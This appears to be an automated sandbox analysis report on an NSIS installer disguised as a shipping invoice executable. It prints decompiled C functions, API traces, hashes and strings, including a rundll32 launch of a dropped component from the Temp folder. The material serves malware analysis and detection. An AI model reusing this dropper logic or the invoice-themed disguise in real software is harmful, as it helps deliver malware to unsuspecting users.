                                                                                                                                    0x004017b4
                                                                                                                                    0x004017b6
                                                                                                                                    0x004017b8
                                                                                                                                    0x004017bd
                                                                                                                                    0x004017bd
                                                                                                                                    0x004017c8
                                                                                                                                    0x004017c8
                                                                                                                                    0x004017d9
                                                                                                                                    0x004017db
                                                                                                                                    0x004017db
                                                                                                                                    0x004017dc
                                                                                                                                    0x004017dc
                                                                                                                                    0x004017df
                                                                                                                                    0x004017e2
                                                                                                                                    0x004017e5
                                                                                                                                    0x004017e5
                                                                                                                                    0x004017ec
                                                                                                                                    0x004017fb
                                                                                                                                    0x00401800
                                                                                                                                    0x00401803
                                                                                                                                    0x00401806
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401808
                                                                                                                                    0x0040180b
                                                                                                                                    0x00401865
                                                                                                                                    0x0040186a
                                                                                                                                    0x004015b0
                                                                                                                                    0x00402783
                                                                                                                                    0x00402783
                                                                                                                                    0x004029b8
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029bb
                                                                                                                                    0x00000000
                                                                                                                                    0x0040180d
                                                                                                                                    0x00401813
                                                                                                                                    0x0040181e
                                                                                                                                    0x0040182b
                                                                                                                                    0x00401836
                                                                                                                                    0x0040184c
                                                                                                                                    0x0040184c
                                                                                                                                    0x0040184f
                                                                                                                                    0x00000000
                                                                                                                                    0x00401855
                                                                                                                                    0x00401855
                                                                                                                                    0x00401856
                                                                                                                                    0x00401873
                                                                                                                                    0x004029c1
                                                                                                                                    0x004029c1
                                                                                                                                    0x004029c1
                                                                                                                                    0x00401858
                                                                                                                                    0x00401858
                                                                                                                                    0x00401859
                                                                                                                                    0x00401492
                                                                                                                                    0x0040234e
                                                                                                                                    0x0040234e
                                                                                                                                    0x0040234e
                                                                                                                                    0x00401856
                                                                                                                                    0x0040184f
                                                                                                                                    0x004029c3
                                                                                                                                    0x004029c7
                                                                                                                                    0x004029c7
                                                                                                                                    0x00401883
                                                                                                                                    0x00401888
                                                                                                                                    0x00401896
                                                                                                                                    0x0040189b
                                                                                                                                    0x004018a1
                                                                                                                                    0x004018a5
                                                                                                                                    0x004018a7
                                                                                                                                    0x004018af
                                                                                                                                    0x004018bb
                                                                                                                                    0x004018a9
                                                                                                                                    0x004018a9
                                                                                                                                    0x004018ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018c4
                                                                                                                                    0x004018ca
                                                                                                                                    0x004018cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004018d2
                                                                                                                                    0x004018d2
                                                                                                                                    0x004018d5
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018d7
                                                                                                                                    0x004018da
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018f2
                                                                                                                                    0x004018f7
                                                                                                                                    0x00402349
                                                                                                                                    0x00000000
                                                                                                                                    0x00402349
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,rundll32.exe Prehnite,Lychnises,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,rundll32.exe Prehnite,Lychnises,rundll32.exe Prehnite,Lychnises,00000000,00000000,rundll32.exe Prehnite,Lychnises,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                      • Part of subcall function 00406166: lstrcpynA.KERNEL32(?,?,00000400,0040347B,Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00406173
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$rundll32.exe Prehnite,Lychnises
                                                                                                                                    • API String ID: 1941528284-3385065982
                                                                                                                                    • Opcode ID: 95783ee652e82e45a183bb9a5dadce108a0dfd522e0a6921b6cbffd4d3137759
                                                                                                                                    • Instruction ID: 0d24fbf38afd7fb560e0b59b59096af1ff73f14f9e2588428075e9193dc755de
                                                                                                                                    • Opcode Fuzzy Hash: 95783ee652e82e45a183bb9a5dadce108a0dfd522e0a6921b6cbffd4d3137759
                                                                                                                                    • Instruction Fuzzy Hash: 7941B432900514BACB107BB5CD45DAF3679EF05369F20833BF416F60E2D67C8A519A6E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406490, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406490(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                                    0x004064a7
                                                                                                                                    0x004064b0
                                                                                                                                    0x004064b2
                                                                                                                                    0x004064b2
                                                                                                                                    0x004064b6
                                                                                                                                    0x004064c8
                                                                                                                                    0x004064c2
                                                                                                                                    0x004064c2
                                                                                                                                    0x004064c2
                                                                                                                                    0x004064cc
                                                                                                                                    0x004064e0
                                                                                                                                    0x004064f4
                                                                                                                                    0x004064fb

                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A7
                                                                                                                                    • wsprintfA.USER32 ref: 004064E0
                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                    • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                    • Instruction ID: 5c9ba02e0f5ecaabbb2a6fa43fbb70e0047563966992d60890c655317a48286c
                                                                                                                                    • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                    • Instruction Fuzzy Hash: 5EF0F63051060A6BDB559B64DD0DFEB365CAB08304F14057AA68AE11C1EA78D8398B5C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004031E2, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E004031E2(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t31 =  *0x429444; // 0xa0970
				_t33 = _t31 -  *0x40b878 + _a4;
				 *0x42f430 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402D75(1);
					return 0;
				}
				E00403361( *0x429454);
				SetFilePointer( *0x40a01c,  *0x40b878, 0, 0); // executed
				 *0x429450 = _t33;
				 *0x429440 = 0;
				while(1) {
					_t10 =  *0x429448; // 0x6af57
					_t30 = 0x4000;
					_t11 = _t10 -  *0x429454;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E0040334B(0x41d440, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429454 =  *0x429454 + _t30;
					 *0x40b880 = 0x41d440;
					 *0x40b884 = _t30;
					L6:
					L6:
					if( *0x42f434 != 0 &&  *0x42f4e0 == 0) {
						_t19 =  *0x429450; // 0xf65d
						 *0x429440 = _t19 -  *0x429444 - _a4 +  *0x40b878;
						E00402D75(0);
					}
					 *0x40b888 = 0x415440;
					 *0x40b88c = 0x8000;
					if(E00406623(0x40b880) < 0) {
						goto L20;
					}
					_t35 =  *0x40b888; // 0x4165b0
					_t36 = _t35 - 0x415440;
					if(_t36 == 0) {
						__eflags =  *0x40b884; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429444; // 0xa0970
						if(_t16 -  *0x40b878 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405DA6( *0x40a01c, 0x415440, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b878 =  *0x40b878 + _t36;
					_t48 =  *0x40b884; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}
















                                                                                                                                    0x004031e5
                                                                                                                                    0x004031f2
                                                                                                                                    0x00403205
                                                                                                                                    0x0040320a
                                                                                                                                    0x0040333a
                                                                                                                                    0x0040333c
                                                                                                                                    0x00000000
                                                                                                                                    0x00403342
                                                                                                                                    0x00403216
                                                                                                                                    0x00403229
                                                                                                                                    0x0040322f
                                                                                                                                    0x00403235
                                                                                                                                    0x00403240
                                                                                                                                    0x00403240
                                                                                                                                    0x00403245
                                                                                                                                    0x0040324a
                                                                                                                                    0x00403252
                                                                                                                                    0x00403254
                                                                                                                                    0x00403254
                                                                                                                                    0x0040325d
                                                                                                                                    0x00403264
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040326a
                                                                                                                                    0x00403270
                                                                                                                                    0x00403276
                                                                                                                                    0x00000000
                                                                                                                                    0x0040327c
                                                                                                                                    0x00403282
                                                                                                                                    0x0040328c
                                                                                                                                    0x004032a2
                                                                                                                                    0x004032a7
                                                                                                                                    0x004032ac
                                                                                                                                    0x004032b2
                                                                                                                                    0x004032b8
                                                                                                                                    0x004032c9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004032cb
                                                                                                                                    0x004032d1
                                                                                                                                    0x004032d3
                                                                                                                                    0x004032f6
                                                                                                                                    0x004032fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004032fe
                                                                                                                                    0x00403300
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403302
                                                                                                                                    0x00403302
                                                                                                                                    0x00403315
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403324
                                                                                                                                    0x00000000
                                                                                                                                    0x00403324
                                                                                                                                    0x004032dd
                                                                                                                                    0x004032e4
                                                                                                                                    0x00403331
                                                                                                                                    0x00403337
                                                                                                                                    0x00403337
                                                                                                                                    0x00000000
                                                                                                                                    0x00403337
                                                                                                                                    0x004032e6
                                                                                                                                    0x004032ec
                                                                                                                                    0x004032f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403335
                                                                                                                                    0x00403335
                                                                                                                                    0x00000000
                                                                                                                                    0x00403335
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004031F6
                                                                                                                                      • Part of subcall function 00403361: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403061,?), ref: 0040336F
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040310C,00000004,00000000,00000000,?,?,00403088,000000FF,00000000,00000000,0040A130,?), ref: 00403229
                                                                                                                                    • SetFilePointer.KERNELBASE(000A0970,00000000,00000000,0040B880,0041D440,00004000,?,00000000,0040310C,00000004,00000000,00000000,?,?,00403088,000000FF), ref: 00403324
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                                    • String ID: @TA$p
                                                                                                                                    • API String ID: 1092082344-1633522545
                                                                                                                                    • Opcode ID: 65e295836797f465d6f87047955051ebaaea20ed010ffd132a0a9e5062fbf2e5
                                                                                                                                    • Instruction ID: 7d9149e57ab4ca5e2efc3b6109a7dda39540d8cae81da205c7fa460a022e7ea3
                                                                                                                                    • Opcode Fuzzy Hash: 65e295836797f465d6f87047955051ebaaea20ed010ffd132a0a9e5062fbf2e5
                                                                                                                                    • Instruction Fuzzy Hash: BD319372604201DBD720AF66EE849163BACF75039E794413FEC40B22F0CB38AD429B5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405D2E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405D2E(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3cc; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                                                                    0x00405d32
                                                                                                                                    0x00405d38
                                                                                                                                    0x00405d39
                                                                                                                                    0x00405d39
                                                                                                                                    0x00405d3e
                                                                                                                                    0x00405d3f
                                                                                                                                    0x00405d42
                                                                                                                                    0x00405d4c
                                                                                                                                    0x00405d59
                                                                                                                                    0x00405d5c
                                                                                                                                    0x00405d64
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405d68
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405d6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00405d6a
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405D42
                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D5C
                                                                                                                                    Strings
                                                                                                                                    • nsa, xrefs: 00405D39
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D31
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 00405D2E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-1564492482
                                                                                                                                    • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                    • Instruction ID: de9a854a4fa859a30a4a9b59d99d9da2062d6b2b4d40687377e9b0ef136d8f1b
                                                                                                                                    • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                    • Instruction Fuzzy Hash: 9BF0E2363046086BDB108F55EC08B9B7B98DF91710F04C03BFA489A180D6B498248798
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004030DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E004030DA(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f498;
					 *0x429444 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004031E2(4);
				if(_t22 >= 0) {
					_t24 = E00405D77( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429444 =  *0x429444 + 4;
						_t36 = E004031E2(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429444 =  *0x429444 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405D77( *0x40a01c, 0x41d440, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405DA6(_a8, 0x41d440, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429444 =  *0x429444 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                                                                    0x004030de
                                                                                                                                    0x004030e7
                                                                                                                                    0x004030f0
                                                                                                                                    0x004030f4
                                                                                                                                    0x004030ff
                                                                                                                                    0x004030ff
                                                                                                                                    0x00403107
                                                                                                                                    0x0040310e
                                                                                                                                    0x00403120
                                                                                                                                    0x00403127
                                                                                                                                    0x004031cc
                                                                                                                                    0x004031cc
                                                                                                                                    0x00000000
                                                                                                                                    0x0040312d
                                                                                                                                    0x00403130
                                                                                                                                    0x0040313c
                                                                                                                                    0x00403140
                                                                                                                                    0x004031da
                                                                                                                                    0x004031da
                                                                                                                                    0x00403146
                                                                                                                                    0x00403149
                                                                                                                                    0x004031a8
                                                                                                                                    0x004031ae
                                                                                                                                    0x004031b0
                                                                                                                                    0x004031b0
                                                                                                                                    0x004031c2
                                                                                                                                    0x004031ca
                                                                                                                                    0x004031d1
                                                                                                                                    0x004031d4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040314b
                                                                                                                                    0x0040314e
                                                                                                                                    0x00000000
                                                                                                                                    0x00403154
                                                                                                                                    0x00403159
                                                                                                                                    0x00403160
                                                                                                                                    0x00403163
                                                                                                                                    0x00403165
                                                                                                                                    0x00403165
                                                                                                                                    0x00403172
                                                                                                                                    0x0040317c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403185
                                                                                                                                    0x0040318c
                                                                                                                                    0x004031a4
                                                                                                                                    0x004031ce
                                                                                                                                    0x004031ce
                                                                                                                                    0x0040318e
                                                                                                                                    0x0040318e
                                                                                                                                    0x00403191
                                                                                                                                    0x00403194
                                                                                                                                    0x0040319a
                                                                                                                                    0x004031a0
                                                                                                                                    0x00000000
                                                                                                                                    0x004031a2
                                                                                                                                    0x00000000
                                                                                                                                    0x004031a2
                                                                                                                                    0x004031a0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040318c
                                                                                                                                    0x00000000
                                                                                                                                    0x00403159
                                                                                                                                    0x0040314e
                                                                                                                                    0x00403149
                                                                                                                                    0x00403140
                                                                                                                                    0x00403127
                                                                                                                                    0x004031dc
                                                                                                                                    0x004031df

                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403088,000000FF,00000000,00000000,0040A130,?), ref: 004030FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID: p
                                                                                                                                    • API String ID: 973152223-2594693909
                                                                                                                                    • Opcode ID: f73b80e98d304b7f5ca7ac44a0a442066c20f2fd601dc72638dcd22d65b85706
                                                                                                                                    • Instruction ID: 23f3f5bc049b8e00f9728ad3ac623f3606ebf7a1438505065764dde9de52b7fa
                                                                                                                                    • Opcode Fuzzy Hash: f73b80e98d304b7f5ca7ac44a0a442066c20f2fd601dc72638dcd22d65b85706
                                                                                                                                    • Instruction Fuzzy Hash: AD319F30600219EFDB20DF55DD44A9A3FACEF09359F20443AF908EA190D778DE51DBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402B2C(0xfffffff0);
				_t13 = E00405B97(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405B29(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004057D0(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x2c)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x2c)) == _t26 || E004057ED(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405753(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x30)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406166("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                                    0x004015bb
                                                                                                                                    0x004015c2
                                                                                                                                    0x004015c5
                                                                                                                                    0x004015ca
                                                                                                                                    0x004015ce
                                                                                                                                    0x004015d0
                                                                                                                                    0x004015d8
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015e0
                                                                                                                                    0x004015e3
                                                                                                                                    0x004015fb
                                                                                                                                    0x004015fc
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x00000000
                                                                                                                                    0x004015f3
                                                                                                                                    0x004015f4
                                                                                                                                    0x004015f4
                                                                                                                                    0x004015e8
                                                                                                                                    0x00401603
                                                                                                                                    0x0040160a
                                                                                                                                    0x00401617
                                                                                                                                    0x00401617
                                                                                                                                    0x0040160c
                                                                                                                                    0x0040160d
                                                                                                                                    0x00401615
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401615
